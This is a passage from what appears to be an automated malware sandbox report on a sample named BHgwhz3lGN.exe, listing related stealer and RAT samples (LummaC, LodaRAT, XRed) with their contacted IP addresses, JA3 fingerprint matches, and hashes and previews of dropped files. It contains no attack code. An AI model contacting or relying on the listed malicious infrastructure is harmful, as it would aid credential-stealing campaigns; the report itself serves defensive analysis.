                                                                                                                                                                                                                                                                                          MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                                                          l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                                                          SQHE4Hsjo6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                                                          CLOUDFLARENETUSUmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 104.21.96.1
                                                                                                                                                                                                                                                                                          PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 172.67.148.118
                                                                                                                                                                                                                                                                                          https://aiihsr.com/FloridaCUGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                                                                                                                                          https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 104.18.35.227
                                                                                                                                                                                                                                                                                          https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.atGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 104.21.20.126
                                                                                                                                                                                                                                                                                          https://btrhbfeojofxcpxuwnsp5h7h22htohw4btqegnxatocbkgdlfiawhyid.atGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 172.67.192.228
                                                                                                                                                                                                                                                                                          eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                          • 104.21.18.19
                                                                                                                                                                                                                                                                                          PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                                                                                          Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          • 172.67.144.225
                                                                                                                                                                                                                                                                                          Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                          • 172.67.144.225

                                                                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Open Purchase Order Summary Details-16-12-2024.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                                          Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                                          Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                                          Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                                          xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                                          valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                                          VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                                          New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                                          Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99
                                                                                                                                                                                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                          • 116.203.14.4
                                                                                                                                                                                                                                                                                          • 149.154.167.99

                                                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\0rqq1n

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                          MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                          SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                          SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                          SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\16890r

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\1n7qqi

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\1no8gd

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\26x4wt

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\2d2n79

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\2djekn

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\3wtr1v

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\ProgramData\6xb1d\5f3oph

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                          Encrypted:false
